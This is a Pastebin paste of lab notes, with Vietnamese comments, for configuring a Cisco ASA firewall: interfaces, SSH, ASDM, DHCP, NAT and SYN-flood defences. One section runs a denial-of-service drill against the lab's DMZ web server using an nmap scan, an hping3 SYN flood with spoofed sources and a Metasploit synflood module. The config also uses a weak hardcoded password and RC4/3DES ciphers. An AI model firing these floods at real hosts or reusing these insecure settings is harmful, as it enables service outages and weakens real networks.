Advertisement
foryou97

Config Firewall

Sep 26th, 2018
131
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 3.39 KB | None | 0 0
  1. en
  2. conf t
  3. hostname ASA
  4. domain-name team3.lab
  5. username root password team3 privilege 15
  6. crypto key generate rsa general-key modulus 2048
  7. write
  8.  
  9.  
  10. # Cau hinh may dieu khien
  11. show interface ip brief
  12. int Ethernet0
  13. ip address 192.168.56.253 255.255.255.0
  14. no shutdown
  15. nameif Management
  16. management-only
  17. security-level 100
  18. exit
  19.  
  20. # Cau hinh may dich vu
  21. interface Ethernet2
  22. nameif dmz
  23. ip address 192.168.255.253 255.255.255.0
  24. no shutdown
  25. exit
  26. write
  27.  
  28. # Cau hinh may inside
  29. interface Ethernet1
  30. nameif inside
  31. ip address 192.168.100.253 255.255.255.0
  32. no shutdown
  33. exit
  34. write
  35.  
  36. # Cau hinh may outside
  37. interface Ethernet3
  38. nameif outside
  39. ip address dhcp setroute
  40. no shutdown
  41. exit
  42. write
  43.  
  44. # Cau hinh SSH
  45. aaa authentication ssh console LOCAL
  46. ssh 192.168.56.0 255.255.255.0 Management
  47.  
  48. # Update firmware
  49. copy tftp: flash:
  50. http server enable
  51. http 192.168.56.0 255.255.255.0 Management
  52. ssl encryption rc4-sha1 aes128-sha1 aes256-sha1 3des-sha1
  53. conf t
  54. asdm image flash:/asdm-762-150.bin
  55. exit
  56. write
  57.  
  58. # Update anyconnect
  59. copy tftp: flash:
  60. 192.168.56.1
  61. anyconnect-win-4.4.02039.pkg
  62. webvpn
  63. anyconnect image flash:/anyconnect-win-4.4.02039.pkg
  64. anyconnect enable
  65. write
  66.  
  67. # DHCP cho vung inside
  68. dhcpd address 192.168.100.101-192.168.100.200 inside
  69. dhcpd dns 8.8.8.8 8.8.4.4 interface inside
  70. dhcpd lease 28880 interface inside
  71. dhcpd domain team3.lab interface inside
  72. dhcpd option 3 ip 192.168.100.253 interface inside
  73. dhcpd enable inside
  74.  
  75. # Tao Object
  76. object network PUBLIC_IP
  77.  range 192.168.233.100 192.168.233.160
  78. exit
  79. object network DMZ
  80.  subnet 192.168.255.0 255.255.255.0
  81. exit
  82. object network INTERNAL
  83.  subnet 192.168.100.0 255.255.255.0
  84. exit
  85.  
  86. # Thiet lap NAT cho vung inside
  87. object network INTERNAL
  88.  nat (inside,outside) dynamic interface
  89. exit
  90.  
  91. # Nat cho vung dmz
  92. object network WEB-SERVER
  93.  host 192.168.255.129
  94.  nat (dmz,outside) static interface service tcp 80 80
  95. exit
  96.  
  97. object network WEB-SERVER
  98.  host 192.168.255.129
  99.  nat (dmz,outside) dynamic interface
  100. exit
  101.  
  102.  
  103. # DDos server 192.168.255.129
  104. --  Quet port dang bat tren server
  105.                                     nmap -Pn -sS -p 80 192.168.255.129
  106.     Hien cong 23/tcp
  107. --  Attack
  108.                                     hping3 -S -p 80 --flood --rand-source 192.168.255.129
  109.  
  110. # Tao access-list cho host 192.168.255.129
  111. access-list syn permit tcp any host 192.168.255.129 eq telnet
  112. access-list syn permit tcp any host 192.168.255.129 eq ssh
  113. access-list syn permit tcp any host 192.168.255.129 eq http
  114. access-list syn permit tcp any host 192.168.255.129 eq https
  115.  
  116.  
  117. # Defence firewall
  118. access-list syn permit tcp any 192.168.255.129 eq 23
  119. class-map syn
  120. match access-list syn
  121. show run service-policy
  122. policy-map global_policy
  123. class dos
  124. set connection embryonic-conn-max 100
  125. end
  126. show run policy-map
  127. show conn count
  128.  
  129.  
  130. policy-map syn
  131. class dos
  132. set connection embryonic-conn-max 10000
  133.  
  134.  
  135.  
  136.  
  137.  
  138.  
  139. conf t
  140. access-list syn permit tcp any host 13.0.0.1 eq telnet
  141. access-list syn permit tcp any host 13.0.0.1 eq ssh
  142. access-list syn permit tcp any host 13.0.0.1 eq http
  143. access-list syn permit tcp any host 13.0.0.1 eq https
  144. access-list syn permit tcp any host 13.0.0.1
  145. write
  146. access-group syn in interface outside
  147.  
  148.  
  149. show resource usage all
  150. show threat-detection rate
  151.  
  152.  
  153. # Cau hinh may dich vu
  154. ifconfig eth0 192.168.255.129 netmask 255.255.255.0
  155. route add default gw 192.168.255.253 eth0
  156.  
  157.  
  158.  
  159. msfconsole
  160. use auxiliary/dos/tcp/synflood
  161. show options
  162. set RHOST 192.168.255.129
  163. exploit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement